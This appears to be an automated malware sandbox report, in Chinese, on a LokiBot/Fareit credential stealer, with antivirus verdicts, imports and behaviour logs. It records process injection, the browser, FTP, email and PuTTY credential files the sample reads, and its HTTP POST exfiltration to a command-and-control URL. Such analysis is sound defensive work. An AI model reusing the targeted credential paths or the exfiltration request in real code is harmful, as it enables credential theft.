10.6
0-day
60 个模型检测该样本为恶意!
重新分析
更多

1605653f82f11b2142c15aa911538d510450a727275ffe42099b63e3da002089

9161252bac3c4292edae98a147ba9285.exe

分析耗时

74s

最近分析

文件大小

598.0KB
静态报毒 动态报毒 100% AGEN AGENTTESLA AI SCORE=84 AIDETECTVM AUTO BTBGMS CLASSIC CONFIDENCE DELF DELPHILESS ELKP ELOY FAREIT GENERICKDZ HIGH CONFIDENCE HJEDQX IGENT KRYPTIK LG0@AAWQSSFI LOKIBOT MALWARE2 MALWARE@#2OVHANU9DYBWZ NQOE PUTTY QVM05 R + MAL R06EC0DI220 SCORE STATIC AI SUSGEN SUSPICIOUS PE TRJGEN TSCOPE UNSAFE WACATAC X2059 ZELPHIF 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Trojan:Win32/LokiBot.5c6e83df 20190527 0.3.0.5
Baidu 20190318 1.0.0.2
Avast Win32:Malware-gen 20201228 21.1.5827.0
Tencent Win32.Backdoor.Fareit.Auto 20201228 1.0.0.1
Kingsoft 20201228 2017.9.26.565
McAfee Fareit-FSK!9161252BAC3C 20201228 6.0.6.653
CrowdStrike win/malicious_confidence_100% (W) 20190702 1.0
静态指标
Queries for the computername (1 个事件)
Time & API Arguments Status Return Repeated
1619686140.650246
GetComputerNameW
computer_name: OSKAR-PC
success 1 0
Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Tries to locate where the browsers are installed (1 个事件)
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 个事件)
Time & API Arguments Status Return Repeated
1619686138.932246
GlobalMemoryStatusEx
success 1 0
The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 个事件)
section CODE
section DATA
section BSS
The executable uses a known packer (1 个事件)
packer BobSoft Mini Delphi -> BoB / BobSoft
One or more processes crashed (1 个事件)
Time & API Arguments Status Return Repeated
1619686137.010822
__exception__
stacktrace: 
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x763533ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77d69ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77d69ea5

registers.esp: 34733888
registers.edi: 0
registers.eax: 0
registers.ebp: 34733960
registers.edx: 0
registers.ebx: 0
registers.esi: 0
registers.ecx: 6
exception.instruction_r: f7 f0 33 c0 5a 59 59 64 89 10 eb 5e e9 de 9b fa
exception.symbol: 9161252bac3c4292edae98a147ba9285+0x599bd
exception.instruction: div eax
exception.module: 9161252bac3c4292edae98a147ba9285.exe
exception.exception_code: 0xc0000094
exception.offset: 367037
exception.address: 0x4599bd
success 0 0
行为判定
动态指标
One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.
HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 个事件)
suspicious_features POST method with no referer header, HTTP version 1.0 used suspicious_request POST http://mahetechasia.com/data/five/fre.php
Performs some HTTP requests (1 个事件)
request POST http://mahetechasia.com/data/five/fre.php
Sends data using the HTTP POST Method (1 个事件)
request POST http://mahetechasia.com/data/five/fre.php
Allocates read-write-execute memory (usually to unpack itself) (3 个事件)
Time & API Arguments Status Return Repeated
1619686136.822822
NtAllocateVirtualMemory
process_identifier: 2296
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 4096 (MEM_COMMIT)
base_address: 0x003d0000
success 0 0
1619686137.010822
NtAllocateVirtualMemory
process_identifier: 2296
region_size: 49152
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00530000
success 0 0
1619686137.025822
NtAllocateVirtualMemory
process_identifier: 2296
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0xffffffff
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x00780000
success 0 0
Steals private information from local Internet browsers (19 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Web Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
file C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
The binary likely contains encrypted or compressed data indicative of a packer (3 个事件)
entropy 7.565652478268402 section {'size_of_data': '0x0000d000', 'virtual_address': '0x0005a000', 'entropy': 7.565652478268402, 'name': 'DATA', 'virtual_size': '0x0000ce20'} description A section with a high entropy has been found
entropy 7.192305566278029 section {'size_of_data': '0x00026c00', 'virtual_address': '0x00074000', 'entropy': 7.192305566278029, 'name': '.rsrc', 'virtual_size': '0x00026bec'} description A section with a high entropy has been found
entropy 0.34673366834170855 description Overall entropy of this PE file is high
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Harvests credentials from local FTP client softwares (22 个事件)
file C:\Program Files (x86)\FTPGetter\Profile\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FTPGetter\servers.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\wcx_ftp.ini
file C:\Windows\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\GHISLER\wcx_ftp.ini
file C:\Users\Administrator.Oskar-PC\wcx_ftp.ini
file C:\Windows\32BitFtp.ini
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\sitemanager.xml
file C:\Program Files (x86)\FileZilla\Filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\filezilla.xml
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\recentservers.xml
registry HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
registry HKEY_CURRENT_USER\Software\Ghisler\Total Commander
registry HKEY_CURRENT_USER\Software\VanDyke\SecureFX
registry HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
registry HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
registry HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
registry HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
registry HKEY_CURRENT_USER\Software\Martin Prikryl
registry HKEY_LOCAL_MACHINE\Software\Martin Prikryl
Harvests information related to installed instant messenger clients (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Roaming\.purple\accounts.xml
Harvests credentials from local email clients (3 个事件)
registry HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
registry HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
registry HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 个事件)
Process injection Process 2296 called NtSetContextThread to modify thread in remote process 1432
Time & API Arguments Status Return Repeated
1619686137.775822
NtSetContextThread
thread_handle: 0x000000fc
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 1432
success 0 0
Putty Files, Registry Keys and/or Mutexes Detected
Resumed a suspended thread in a remote process potentially indicative of process injection (2 个事件)
Process injection Process 2296 resumed a thread in remote process 1432
Time & API Arguments Status Return Repeated
1619686138.150822
NtResumeThread
thread_handle: 0x000000fc
suspend_count: 1
process_identifier: 1432
success 0 0
Executed a process and injected code into it, probably while unpacking (7 个事件)
Time & API Arguments Status Return Repeated
1619686137.744822
CreateProcessInternalW
thread_identifier: 2468
thread_handle: 0x000000fc
process_identifier: 1432
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\9161252bac3c4292edae98a147ba9285.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000100
inherit_handles: 0
success 1 0
1619686137.744822
NtUnmapViewOfSection
process_identifier: 1432
region_size: 4096
process_handle: 0x00000100
base_address: 0x00400000
success 0 0
1619686137.760822
NtMapViewOfSection
section_handle: 0x00000108
process_identifier: 1432
commit_size: 663552
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000100
allocation_type: 0 ()
section_offset: 0
view_size: 663552
base_address: 0x00400000
success 0 0
1619686137.775822
NtGetContextThread
thread_handle: 0x000000fc
success 0 0
1619686137.775822
NtSetContextThread
thread_handle: 0x000000fc
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274654
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 1432
success 0 0
1619686138.150822
NtResumeThread
thread_handle: 0x000000fc
suspend_count: 1
process_identifier: 1432
success 0 0
1619686139.463246
NtResumeThread
thread_handle: 0x00000110
suspend_count: 1
process_identifier: 1432
success 0 0
File has been identified by 60 AntiVirus engines on VirusTotal as malicious (50 out of 60 个事件)
Bkav W32.AIDetectVM.malware2
Elastic malicious (high confidence)
MicroWorld-eScan Trojan.GenericKDZ.66706
FireEye Generic.mg.9161252bac3c4292
Qihoo-360 Generic/HEUR/QVM05.1.C0C7.Malware.Gen
ALYac Spyware.LokiBot
Cylance Unsafe
Sangfor Malware
K7AntiVirus Trojan ( 005653ce1 )
Alibaba Trojan:Win32/LokiBot.5c6e83df
K7GW Trojan ( 005653ce1 )
Cybereason malicious.bac3c4
Arcabit Trojan.Generic.D10492
Cyren W32/Delf.NQOE-7492
Symantec Trojan.Gen.2
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Trojan.Win32.Crypt.gen
BitDefender Trojan.GenericKDZ.66706
NANO-Antivirus Trojan.Win32.TrjGen.hjedqx
AegisLab Trojan.Multi.Generic.4!c
Avast Win32:Malware-gen
Tencent Win32.Backdoor.Fareit.Auto
Ad-Aware Trojan.GenericKDZ.66706
Sophos Mal/Generic-R + Mal/Fareit-AA
Comodo Malware@#2ovhanu9dybwz
F-Secure Heuristic.HEUR/AGEN.1136310
DrWeb Trojan.PWS.Stealer.23680
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R06EC0DI220
McAfee-GW-Edition BehavesLike.Win32.Fareit.hc
Emsisoft Trojan.GenericKDZ.66706 (B)
SentinelOne Static AI - Suspicious PE
Jiangmin Trojan.Crypt.dcg
Avira HEUR/AGEN.1136310
Antiy-AVL Trojan/Win32.Wacatac
Gridinsoft Trojan.Win32.Kryptik.ba!s1
Microsoft Trojan:Win32/LokiBot.AG!MTB
ZoneAlarm HEUR:Trojan.Win32.Crypt.gen
GData Trojan.GenericKDZ.66706
Cynet Malicious (score: 100)
AhnLab-V3 Suspicious/Win.Delphiless.X2059
Acronis suspicious
McAfee Fareit-FSK!9161252BAC3C
MAX malware (ai score=84)
VBA32 TScope.Trojan.Delf
Malwarebytes Spyware.AgentTesla
Zoner Trojan.Win32.89576
ESET-NOD32 a variant of Win32/Injector.ELOY
TrendMicro-HouseCall TROJ_GEN.R06EC0DI220
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

1992-06-20 06:22:17

Imports

Library kernel32.dll:
0x46813c VirtualFree
0x468140 VirtualAlloc
0x468144 LocalFree
0x468148 LocalAlloc
0x46814c GetVersion
0x468150 GetCurrentThreadId
0x46815c VirtualQuery
0x468160 WideCharToMultiByte
0x468164 MultiByteToWideChar
0x468168 lstrlenA
0x46816c lstrcpynA
0x468170 LoadLibraryExA
0x468174 GetThreadLocale
0x468178 GetStartupInfoA
0x46817c GetProcAddress
0x468180 GetModuleHandleA
0x468184 GetModuleFileNameA
0x468188 GetLocaleInfoA
0x46818c GetCommandLineA
0x468190 FreeLibrary
0x468194 FindFirstFileA
0x468198 FindClose
0x46819c ExitProcess
0x4681a0 WriteFile
0x4681a8 RtlUnwind
0x4681ac RaiseException
0x4681b0 GetStdHandle
Library user32.dll:
0x4681b8 GetKeyboardType
0x4681bc LoadStringA
0x4681c0 MessageBoxA
0x4681c4 CharNextA
Library advapi32.dll:
0x4681cc RegQueryValueExA
0x4681d0 RegOpenKeyExA
0x4681d4 RegCloseKey
Library oleaut32.dll:
0x4681dc SysFreeString
0x4681e0 SysReAllocStringLen
0x4681e4 SysAllocStringLen
Library kernel32.dll:
0x4681ec TlsSetValue
0x4681f0 TlsGetValue
0x4681f4 LocalAlloc
0x4681f8 GetModuleHandleA
Library advapi32.dll:
0x468200 RegQueryValueExA
0x468204 RegOpenKeyExA
0x468208 RegCloseKey
Library kernel32.dll:
0x468210 lstrcpyA
0x468214 WriteFile
0x46821c WaitForSingleObject
0x468220 VirtualQuery
0x468224 VirtualAlloc
0x468228 Sleep
0x46822c SizeofResource
0x468230 SetThreadLocale
0x468234 SetFilePointer
0x468238 SetEvent
0x46823c SetErrorMode
0x468240 SetEndOfFile
0x468244 ResetEvent
0x468248 ReadFile
0x46824c MulDiv
0x468250 LockResource
0x468254 LoadResource
0x468258 LoadLibraryA
0x468264 GlobalUnlock
0x468268 GlobalReAlloc
0x46826c GlobalHandle
0x468270 GlobalLock
0x468274 GlobalFree
0x468278 GlobalFindAtomA
0x46827c GlobalDeleteAtom
0x468280 GlobalAlloc
0x468284 GlobalAddAtomA
0x468288 GetVersionExA
0x46828c GetVersion
0x468290 GetTickCount
0x468294 GetThreadLocale
0x46829c GetSystemTime
0x4682a0 GetSystemInfo
0x4682a4 GetStringTypeExA
0x4682a8 GetStdHandle
0x4682ac GetProcAddress
0x4682b0 GetModuleHandleA
0x4682b4 GetModuleFileNameA
0x4682b8 GetLocaleInfoA
0x4682bc GetLocalTime
0x4682c0 GetLastError
0x4682c4 GetFullPathNameA
0x4682c8 GetDiskFreeSpaceA
0x4682cc GetDateFormatA
0x4682d0 GetCurrentThreadId
0x4682d4 GetCurrentProcessId
0x4682d8 GetCPInfo
0x4682dc GetACP
0x4682e0 FreeResource
0x4682e4 InterlockedExchange
0x4682e8 FreeLibrary
0x4682ec FormatMessageA
0x4682f0 FindResourceA
0x4682f8 ExitThread
0x4682fc EnumCalendarInfoA
0x468308 CreateThread
0x46830c CreateFileA
0x468310 CreateEventA
0x468314 CompareStringA
0x468318 CloseHandle
Library version.dll:
0x468320 VerQueryValueA
0x468328 GetFileVersionInfoA
Library gdi32.dll:
0x468330 UnrealizeObject
0x468334 StretchBlt
0x468338 SetWindowOrgEx
0x46833c SetWinMetaFileBits
0x468340 SetViewportOrgEx
0x468344 SetTextColor
0x468348 SetStretchBltMode
0x46834c SetROP2
0x468350 SetPixel
0x468354 SetEnhMetaFileBits
0x468358 SetDIBColorTable
0x46835c SetBrushOrgEx
0x468360 SetBkMode
0x468364 SetBkColor
0x468368 SelectPalette
0x46836c SelectObject
0x468370 SaveDC
0x468374 RestoreDC
0x468378 Rectangle
0x46837c RectVisible
0x468380 RealizePalette
0x468384 PlayEnhMetaFile
0x468388 PathToRegion
0x46838c PatBlt
0x468390 MoveToEx
0x468394 MaskBlt
0x468398 LineTo
0x46839c IntersectClipRect
0x4683a0 GetWindowOrgEx
0x4683a4 GetWinMetaFileBits
0x4683a8 GetTextMetricsA
0x4683b4 GetStockObject
0x4683b8 GetPixel
0x4683bc GetPaletteEntries
0x4683c0 GetObjectA
0x4683cc GetEnhMetaFileBits
0x4683d0 GetDeviceCaps
0x4683d4 GetDIBits
0x4683d8 GetDIBColorTable
0x4683dc GetDCOrgEx
0x4683e4 GetClipBox
0x4683e8 GetBrushOrgEx
0x4683ec GetBitmapBits
0x4683f0 ExcludeClipRect
0x4683f4 DeleteObject
0x4683f8 DeleteEnhMetaFile
0x4683fc DeleteDC
0x468400 CreateSolidBrush
0x468404 CreatePenIndirect
0x468408 CreatePalette
0x468410 CreateFontIndirectA
0x468414 CreateDIBitmap
0x468418 CreateDIBSection
0x46841c CreateCompatibleDC
0x468424 CreateBrushIndirect
0x468428 CreateBitmap
0x46842c CopyEnhMetaFileA
0x468430 BitBlt
Library user32.dll:
0x468438 CreateWindowExA
0x46843c WindowFromPoint
0x468440 WinHelpA
0x468444 WaitMessage
0x468448 UpdateWindow
0x46844c UnregisterClassA
0x468450 UnhookWindowsHookEx
0x468454 TranslateMessage
0x46845c TrackPopupMenu
0x468464 ShowWindow
0x468468 ShowScrollBar
0x46846c ShowOwnedPopups
0x468470 ShowCursor
0x468474 SetWindowsHookExA
0x468478 SetWindowPos
0x46847c SetWindowPlacement
0x468480 SetWindowLongA
0x468484 SetTimer
0x468488 SetScrollRange
0x46848c SetScrollPos
0x468490 SetScrollInfo
0x468494 SetRect
0x468498 SetPropA
0x46849c SetParent
0x4684a0 SetMenuItemInfoA
0x4684a4 SetMenu
0x4684a8 SetForegroundWindow
0x4684ac SetFocus
0x4684b0 SetCursor
0x4684b4 SetClassLongA
0x4684b8 SetCapture
0x4684bc SetActiveWindow
0x4684c0 SendMessageA
0x4684c4 ScrollWindow
0x4684c8 ScreenToClient
0x4684cc RemovePropA
0x4684d0 RemoveMenu
0x4684d4 ReleaseDC
0x4684d8 ReleaseCapture
0x4684e4 RegisterClassA
0x4684e8 RedrawWindow
0x4684ec PtInRect
0x4684f0 PostQuitMessage
0x4684f4 PostMessageA
0x4684f8 PeekMessageA
0x4684fc OffsetRect
0x468500 OemToCharA
0x468504 MessageBoxA
0x468508 MapWindowPoints
0x46850c MapVirtualKeyA
0x468510 LoadStringA
0x468514 LoadKeyboardLayoutA
0x468518 LoadIconA
0x46851c LoadCursorA
0x468520 LoadBitmapA
0x468524 KillTimer
0x468528 IsZoomed
0x46852c IsWindowVisible
0x468530 IsWindowEnabled
0x468534 IsWindow
0x468538 IsRectEmpty
0x46853c IsIconic
0x468540 IsDialogMessageA
0x468544 IsChild
0x468548 InvalidateRect
0x46854c IntersectRect
0x468550 InsertMenuItemA
0x468554 InsertMenuA
0x468558 InflateRect
0x468560 GetWindowTextA
0x468564 GetWindowRect
0x468568 GetWindowPlacement
0x46856c GetWindowLongA
0x468570 GetWindowDC
0x468574 GetTopWindow
0x468578 GetSystemMetrics
0x46857c GetSystemMenu
0x468580 GetSysColorBrush
0x468584 GetSysColor
0x468588 GetSubMenu
0x46858c GetScrollRange
0x468590 GetScrollPos
0x468594 GetScrollInfo
0x468598 GetPropA
0x46859c GetParent
0x4685a0 GetWindow
0x4685a4 GetMenuStringA
0x4685a8 GetMenuState
0x4685ac GetMenuItemInfoA
0x4685b0 GetMenuItemID
0x4685b4 GetMenuItemCount
0x4685b8 GetMenu
0x4685bc GetLastActivePopup
0x4685c0 GetKeyboardState
0x4685c8 GetKeyboardLayout
0x4685cc GetKeyState
0x4685d0 GetKeyNameTextA
0x4685d4 GetIconInfo
0x4685d8 GetForegroundWindow
0x4685dc GetFocus
0x4685e0 GetDlgItem
0x4685e4 GetDesktopWindow
0x4685e8 GetDCEx
0x4685ec GetDC
0x4685f0 GetCursorPos
0x4685f4 GetCursor
0x4685f8 GetClipboardData
0x4685fc GetClientRect
0x468600 GetClassNameA
0x468604 GetClassInfoA
0x468608 GetCapture
0x46860c GetActiveWindow
0x468610 FrameRect
0x468614 FindWindowA
0x468618 FillRect
0x46861c EqualRect
0x468620 EnumWindows
0x468624 EnumThreadWindows
0x468628 EndPaint
0x46862c EnableWindow
0x468630 EnableScrollBar
0x468634 EnableMenuItem
0x468638 DrawTextA
0x46863c DrawMenuBar
0x468640 DrawIconEx
0x468644 DrawIcon
0x468648 DrawFrameControl
0x46864c DrawFocusRect
0x468650 DrawEdge
0x468654 DispatchMessageA
0x468658 DestroyWindow
0x46865c DestroyMenu
0x468660 DestroyIcon
0x468664 DestroyCursor
0x468668 DeleteMenu
0x46866c DefWindowProcA
0x468670 DefMDIChildProcA
0x468674 DefFrameProcA
0x468678 CreatePopupMenu
0x46867c CreateMenu
0x468680 CreateIcon
0x468684 ClientToScreen
0x468688 CheckMenuItem
0x46868c CallWindowProcA
0x468690 CallNextHookEx
0x468694 BeginPaint
0x468698 CharNextA
0x46869c CharLowerBuffA
0x4686a0 CharLowerA
0x4686a4 CharToOemA
0x4686a8 AdjustWindowRectEx
Library kernel32.dll:
0x4686b4 Sleep
Library oleaut32.dll:
0x4686bc SafeArrayPtrOfIndex
0x4686c0 SafeArrayGetUBound
0x4686c4 SafeArrayGetLBound
0x4686c8 SafeArrayCreate
0x4686cc VariantChangeType
0x4686d0 VariantCopy
0x4686d4 VariantClear
0x4686d8 VariantInit
Library comctl32.dll:
0x4686e8 ImageList_Write
0x4686ec ImageList_Read
0x4686fc ImageList_DragMove
0x468700 ImageList_DragLeave
0x468704 ImageList_DragEnter
0x468708 ImageList_EndDrag
0x46870c ImageList_BeginDrag
0x468710 ImageList_Remove
0x468714 ImageList_DrawEx
0x468718 ImageList_Draw
0x468728 ImageList_Add
0x468730 ImageList_Destroy
0x468734 ImageList_Create
Library comdlg32.dll:
0x46873c GetSaveFileNameA
0x468740 GetOpenFileNameA

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49176 50.17.5.224 mahetechasia.com 80

UDP

Source Source Port Destination Destination Port
192.168.56.101 49235 114.114.114.114 53
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 65004 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 63429 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702
192.168.56.101 62192 239.255.255.250 3702
192.168.56.101 65005 239.255.255.250 3702
192.168.56.101 65007 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://mahetechasia.com/data/five/fre.php 
POST /data/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: mahetechasia.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 902AECAC
Content-Length: 196
Connection: close

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.